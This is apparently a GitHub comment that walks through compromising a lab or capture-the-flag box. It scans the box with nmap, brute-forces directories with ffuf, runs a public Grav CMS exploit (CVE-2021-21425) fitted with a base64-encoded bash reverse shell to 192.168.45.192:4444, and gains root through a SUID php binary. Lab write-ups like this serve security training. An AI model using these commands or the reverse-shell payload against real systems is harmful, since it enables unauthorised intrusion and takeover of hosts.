WDavid404
commented
4 months ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-03-17 17:46 grav-admin/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEADAccess ”http://192.168.243.12/grav-admin/“
--> Grav, Trilby Media
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.12/grav-admin/FUZZ
Try access these pages but no progress
(Try admin/admin login but failed)
search exploits info fro Grav and Trilby (even though we don't know the version info ) --> https://github.com/CsEnox/CVE-2021-21425
Anyway, try it:
At firts, need to edit 449973.py file:
- change target IP to the target host
- change base64 value by
echo -ne "bash -i >& /dev/tcp/192.168.45.192/4444 0>&1" | base64 -w0===>YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE5Mi80NDQ0IDA+JjE=
Run 'python3 49973.py'
--> we get reverse shell from the target host!
linpeas
-->
As Exghost box, we saw [CVE-2021-4034] PwnKit
but it didn't work 😄
find / -perm -u=s -type f 2>/dev/null --> /usr/bin/php7.4
According to https://gtfobins.github.io/gtfobins/php/,
we can get root (even though id still is www-data)
Phoenix1112
Keypoints: